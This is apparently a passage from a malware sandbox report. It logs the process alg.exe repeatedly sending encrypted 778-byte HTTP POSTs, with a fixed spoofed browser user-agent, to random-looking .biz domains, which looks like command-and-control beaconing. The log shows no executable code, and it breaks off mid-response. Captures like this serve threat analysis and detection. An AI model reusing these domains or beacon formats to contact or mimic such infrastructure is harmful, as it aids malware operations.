                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=bf92a9e77f2ce96a0d9b77eb4a3f7858|155.94.241.188|1730130742|1730130742|0|1|0; path=/; domain=.cpclnad.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.5 | 50078 | 44.221.84.105 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:22.239156008 CET | 343 | OUT | POST /ap HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mjheo.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:52:22.239190102 CET  778  OUT  Data Raw: b1 c6 49 26 51 bd 21 aa fe 02 00 00 bd 29 9e ae 1e d4 3c 58 1b 42 e0 81 95 64 5a c4 a9 82 3c 41 2f 3f 97 bd 22 4f 97 a9 ae 23 90 7c 19 b1 05 63 14 af 0c 9d 5e ef 01 b8 3c 9f 49 34 93 5b 9a a9 1b ce d7 98 59 76 0e d2 58 cd b8 c3 f5 fe e3 6f 0b a2
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: I&Q!)<XBdZ<A/?"O#|c^<I4[YvXo;aV:>8|bU1]4I^GV.\ln&:!wX^{d3jW`v{&JtGtKw4h[@?Pp`>=EbMu!RDA^r
Oct 28, 2024 16:52:22.907759905 CET  413  IN  HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=731c54b240ef6a9645498cad443de438|155.94.241.188|1730130742|1730130742|0|1|0; path=/; domain=.mjheo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
103         192.168.2.5  50079        18.141.10.107   80                2636  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:52:22.928023100 CET  353  OUT  POST /lpcmjvhkj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wluwplyh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:52:22.928083897 CET  778  OUT  Data Raw: 78 1e 3f 4e bc d3 d7 9d fe 02 00 00 85 8f 10 2a 40 98 36 d4 fb 2d d3 e9 e5 21 4b 31 68 c6 53 9d 30 a8 30 a7 75 b9 33 19 5a 70 ef bd 39 f8 73 fc 21 6e 66 9a f1 d8 9c ff bb 3c 8b f9 17 ee a0 f0 41 5c 66 af 93 23 62 3e 1c 94 03 57 c1 0c c6 f0 86 2c
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: x?N*@6-!K1hS00u3Zp9s!nf<A\f#b>W,j}F9>k"G2'-6c.&]C]96m|(aj8sp@!587h]tL>Ze\.w*
Oct 28, 2024 16:52:24.365535021 CET  416  IN  HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2b8625d7d3da3dfa6dfa859ca6af83e2|155.94.241.188|1730130744|1730130744|0|1|0; path=/; domain=.wluwplyh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Oct 28, 2024 16:52:24.733189106 CET  416  IN  HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2b8625d7d3da3dfa6dfa859ca6af83e2|155.94.241.188|1730130744|1730130744|0|1|0; path=/; domain=.wluwplyh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
104         192.168.2.5  60569        18.208.156.248  80                2636  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:52:25.508419991 CET  354  OUT  POST /sjbthkaicrc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: zgapiej.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:52:25.510689020 CET  778  OUT  Data Raw: 5a ee 09 65 b9 39 32 0a fe 02 00 00 9e 43 5b 32 f1 21 d8 62 2d 57 80 aa 4b 44 a2 02 5a d4 69 9e ea 21 78 3e 0c 89 41 28 6c c4 91 3c 4f 7b d5 3d 34 8a cd 43 58 2a b6 9c 96 15 bb 4d 49 e2 b8 b6 8f 45 c0 4a 28 b2 12 04 a0 bd 78 99 fb 8e 50 52 cb b6
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: Ze92C[2!b-WKDZi!x>A(l<O{=4CX*MIEJ(xPRKSJk:LVP(G8 |~u4V~d6uGjn /rw 4cICLm[U9}OD@/I5{:|{^VU[K\t!Gp4z
Oct 28, 2024 16:52:26.182507038 CET  415  IN  HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=bdc2d0feee6bced0cb43da9093357c43|155.94.241.188|1730130746|1730130746|0|1|0; path=/; domain=.zgapiej.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.5 | 60570 | 44.221.84.105 | 80 | 2636 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:26.202745914 CET | 343 | OUT | POST /dq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jifai.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:52:26.202774048 CET | 778 | OUT | Data Raw: 52 0f ba 82 83 64 47 78 fe 02 00 00 07 4f 3d d1 ca 28 bc 0c 98 42 ea 68 8e f1 52 75 5f f6 a5 7a 17 f6 f6 fa d5 14 9d 1b bc ee 0a ea 83 84 46 5e 43 d4 5f d9 af 18 04 f1 ac b1 13 0a 80 0b 8d 0b b3 61 53 b3 9f 77 d9 cb 71 0a 66 ce 75 e0 45 29 83 4b
Data Ascii: RdGxO=(BhRu_zF^C_aSwqfuE)K27DNXoY7A?mJ~oT9*xEI Tv$]SUR^6z6=uo]lf,o`zhTC+NuM
Oct 28, 2024 16:52:26.872064114 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=29b75d393543c469a04c5d10290831e1|155.94.241.188|1730130746|1730130746|0|1|0; path=/; domain=.jifai.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
106 | 192.168.2.5 | 60571 | 13.251.16.150 | 80 | 2636 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:26.929936886 CET | 352 | OUT | POST /skriadsmnm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xnxvnn.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:52:26.929963112 CET | 778 | OUT | Data Raw: 4a 31 6a a0 4c 8f 5c e6 fe 02 00 00 bf 0d e8 66 f0 7d d6 13 fe a7 a7 5d ea e0 19 52 1f c2 1b c7 d8 d7 e0 39 dc d1 56 f7 15 9f ed 20 92 37 19 a1 5e fa c9 a7 f5 12 bc f0 e2 1b c9 09 98 12 fe 11 a5 21 23 82 c6 5f 2c 27 3f 47 d0 45 4b b5 f1 3b 43 04
Data Ascii: J1jL\f}]R9V 7^!#_,'?GEK;Ct5Gl3Nc68~n;"#Y]@Jo-"<5|AP^3#XqMC3=pxvT>&njZ1w4K%]}d23TC9<`H:V
Oct 28, 2024 16:52:29.264233112 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2448c3449b67f49bd22310c6708a1da1|155.94.241.188|1730130748|1730130748|0|1|0; path=/; domain=.xnxvnn.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Oct 28, 2024 16:52:29.267072916 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2448c3449b67f49bd22310c6708a1da1|155.94.241.188|1730130748|1730130748|0|1|0; path=/; domain=.xnxvnn.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Oct 28, 2024 16:52:29.268178940 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2448c3449b67f49bd22310c6708a1da1|155.94.241.188|1730130748|1730130748|0|1|0; path=/; domain=.xnxvnn.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Oct 28, 2024 16:52:29.268692970 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2448c3449b67f49bd22310c6708a1da1|155.94.241.188|1730130748|1730130748|0|1|0; path=/; domain=.xnxvnn.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
107 | 192.168.2.5 | 60572 | 35.164.78.200 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:29.427431107 CET | 351 | OUT | POST /wawfta HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ihcnogskt.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:52:29.427459955 CET | 778 | OUT | Data Raw: 62 e0 ba e1 3a f4 eb 46 fe 02 00 00 ff be 06 7a af 0e 3b c9 e5 53 2f 52 5b 2a 76 40 a6 15 cf a0 0c bf 3c 0c cc 25 c2 e1 ff 8b 1c 85 c2 b5 8d 16 6a d7 e5 c3 e8 78 3d 35 67 76 51 60 b7 f7 9d 55 49 44 c6 8a 08 6b 49 3c d3 3d 5e fc 49 08 aa c4 e4 d9
Data Ascii: b:Fz;S/R[*v@<%jx=5gvQ`UIDkI<=^Iq"abc0LxEhW~IvpL_}2!J'W-^4-4zbVh.q["+ a+rKZ[Ndn:M(,1Hv]BK<]U,q H
Oct 28, 2024 16:52:30.285726070 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=94a3440e5dee1813ba41665d1e03fbf6|155.94.241.188|1730130750|1730130750|0|1|0; path=/; domain=.ihcnogskt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
108 | 192.168.2.5 | 60573 | 18.141.10.107 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:30.307679892 CET | 356 | OUT | POST /qcdcxwrbvorm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: kkqypycm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:52:30.307708979 CET | 778 | OUT | Data Raw: 8b 97 e8 89 1e 64 2d f1 fe 02 00 00 24 0d ac 02 d3 c4 30 00 b8 86 1f 21 4a 22 73 9a a0 75 e0 04 bc fd 14 2b a6 5a 63 8e d6 59 3b 09 6d e3 cd 9e f9 f4 23 f2 de 23 f9 7b eb a5 42 95 71 02 84 33 16 6c 44 f6 d6 c7 e7 51 da dd c1 7b 77 d2 d9 35 11 1e
Data Ascii: d-$0!J"su+ZcY;m##{Bq3lDQ{w5EX`Nn!0B>;Bx9-Znr#rA{6,29PY`F5GPF^\;W6e$}#9-2b_%vowi.|I`;t;4
Oct 28, 2024 16:52:31.716445923 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=35ad29fa8cec894c4b08887afaa4330b|155.94.241.188|1730130751|1730130751|0|1|0; path=/; domain=.kkqypycm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
109 | 192.168.2.5 | 60574 | 18.246.231.120 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:31.736444950 CET | 343 | OUT | POST /x HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uevrpr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:52:31.736479998 CET | 778 | OUT | Data Raw: e0 6b 86 ae ba 3b 3d 53 fe 02 00 00 94 a5 33 ae 9f fc ae 42 0e e0 83 fa 86 23 26 d3 29 e9 f6 a7 e6 2b 67 64 78 7f c8 19 cb 51 d0 9b 94 87 06 47 db d2 04 8d c6 2d 49 ac 53 ad f0 c5 e0 df e5 ed 58 58 c3 ab df 8b a3 9f 50 91 6e fc 61 34 02 73 7d d4
Data Ascii: k;=S3B#&)+gdxQG-ISXXPna4s}A:Q{YtvE;'6[Ip<8i yu^~GMFRPvwY?tKyL0?hRde5408%W].!XS9&G:txU
Oct 28, 2024 16:52:32.563828945 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4281c90d124344545f9462c18bc78f4d|155.94.241.188|1730130752|1730130752|0|1|0; path=/; domain=.uevrpr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
110 | 192.168.2.5 | 59986 | 34.211.97.45 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:33.266130924 CET | 352 | OUT | POST /lutskhb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: fgajqjyhr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:52:33.266156912 CET | 778 | OUT | Data Raw: 6b ea 6d 93 02 41 50 6a fe 02 00 00 68 9a dd e2 21 b3 f5 1c 5f 52 21 8a 59 ec 00 43 7c f3 71 87 14 57 0d db 33 1b 00 2b 61 29 84 07 f2 5f 4c e5 d0 98 2b 4c 8b 87 dd e4 bf 3c 75 81 cd 37 7f 87 19 92 12 48 ae 72 04 51 ba 85 a2 ef e8 f5 56 2b 44 35
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: kmAPjh!_R!YC|qW3+a)_L+L<u7HrQV+D5au8(]Mnmop]c\QrP0)oDx$Ywd:{DlNTbw!XX^>H83c(U-ecJ($GuIJ^<,U*B_KX&O+Q T
Oct 28, 2024 16:52:34.118547916 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=e235e6545be49d40304bd7fc834f4e94|155.94.241.188|1730130753|1730130753|0|1|0; path=/; domain=.fgajqjyhr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
111 | 192.168.2.5 | 59987 | 18.208.156.248 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:34.138528109 CET | 344 | OUT | POST /b HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: hagujcj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:52:34.138571978 CET | 778 | OUT | Data Raw: 60 db 18 46 3d 46 0c 08 fe 02 00 00 4f 55 dc ef 91 8b 59 85 b6 c7 88 9b d8 72 42 65 aa 66 5c 8b e2 56 0f a2 5d cd 60 6c ee 8e 9f 91 81 ef 8c f2 53 66 b0 40 7c 41 8a 01 40 09 db 8b fa 56 9e cb 78 f5 40 84 12 48 e5 f7 08 f8 0e 93 a0 27 8d 32 2d 4e
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: `F=FOUYrBef\V]`lSf@|A@Vx@H'2-N[wELA.'Q$klrecZnf?L\)<cS}Ed~Y[pdkd4M~$G=TUbU]G{pcmVl@%h
Oct 28, 2024 16:52:34.801428080 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=3bdae8ab21c945df5bf3a0bd941bc137|155.94.241.188|1730130754|1730130754|0|1|0; path=/; domain=.hagujcj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
112 | 192.168.2.5 | 59988 | 35.164.78.200 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:34.821470976 CET | 350 | OUT | POST /ljoreepy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: sctmku.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:52:34.821496964 CET | 778 | OUT | Data Raw: 27 32 0e 6d a8 5c c2 fb fe 02 00 00 f8 98 22 d6 65 af 6d 4c 55 9a 06 38 9c 6e dd df 81 77 fc 7e a6 e0 c3 cc 3c 83 b7 3c c9 c1 93 e7 bd 1f ca 62 c7 30 6b e0 fc 39 bf df 88 58 ad ac d1 01 7c 50 78 8d 93 32 cb cf 7a f2 bb 04 49 78 75 c2 3a e9 7f 7c
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: '2m\"emLU8nw~<<b0k9X|Px2zIxu:|/x#4tW#altRf`6fUZ4+&*$?RaW`3?ez)I/k/aG5L|NHTxh]8k=+VErIfa#w3@14BDu
Oct 28, 2024 16:52:35.771967888 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=cf811e51256658c25ba0490b360c81d2|155.94.241.188|1730130755|1730130755|0|1|0; path=/; domain=.sctmku.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
113 | 192.168.2.5 | 59989 | 34.211.97.45 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:35.983169079 CET | 348 | OUT | POST /wbxnuro HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: qcrsp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.983206987 CET778OUTData Raw: 17 c2 af 4a c7 15 ca fc fe 02 00 00 55 a2 00 1b 74 84 3d f4 a3 9e 41 1a a2 3a 4f 8a e0 58 51 93 cc 5c cf 31 47 8d 74 db db ed e8 e2 a4 76 d1 f5 31 62 cd 61 33 76 62 a0 d7 b6 ec 9b e1 d5 84 c8 31 06 49 df 00 13 68 16 b8 3d 71 1f 54 e8 77 16 b0 d9
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: JUt=A:OXQ\1Gtv1ba3vb1Ih=qTw{u[ Ee.<71>_Um"LE?HGtW^f9[)@E[QA1Mmmg$5x`'>gjB9sZm.o! ~,>
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:36.832375050 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:36 GMT
